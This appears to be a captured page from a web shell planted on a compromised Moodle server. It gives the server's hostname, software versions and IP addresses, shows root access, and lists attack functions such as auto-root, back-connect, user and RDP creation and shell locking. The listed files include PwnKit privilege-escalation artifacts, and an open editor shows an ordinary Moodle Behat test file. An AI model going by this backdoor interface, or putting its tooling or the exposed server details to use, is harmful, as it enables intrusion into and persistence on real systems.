Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
scorm /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_scorm.feature
1.52
KB
-rwxrwxrwx
completion_condition_require_s...
6.88
KB
-rwxrwxrwx
missing_org.feature
1.46
KB
-rwxrwxrwx
multisco_review_mode.feature
12.52
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
save_progress_on_unload.featur...
2.03
KB
-rwxrwxrwx
scorm_no_calendar_capabilities...
1.78
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_progress_on_unload.feature
@mod @mod_scorm @_file_upload @_switch_iframe @_alert Feature: Confirm progress gets saved on unload events In order to let students access a scorm package As a teacher I need to add scorm activity to a course Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | And I change window size to "large" @javascript Scenario: Test progress gets saved correctly when the user navigates away from the scorm activity Given the following "activity" exists: | activity | scorm | | course | C1 | | name | Runtime Basic Calls SCORM 2004 3rd Edition package | | packagefilepath | mod/scorm/tests/packages/RuntimeBasicCalls_SCORM20043rdEdition.zip | When I log in as "student1" And I am on "Course 1" course homepage And I follow "Runtime Basic Calls SCORM 2004 3rd Edition package" Then I should see "Normal" And I press "Enter" And I switch to "scorm_object" iframe And I press "Next" And I press "Next" And I switch to "contentFrame" iframe And I should see "Scoring" And I switch to the main frame And I follow "C1" And I follow "Runtime Basic Calls SCORM 2004 3rd Edition package" And I should see "Normal" And I click on "Enter" "button" confirming the dialogue And I switch to "scorm_object" iframe And I switch to "contentFrame" iframe And I should see "Scoring" And I switch to the main frame # Go away from the scorm to stop background requests And I am on homepage
Close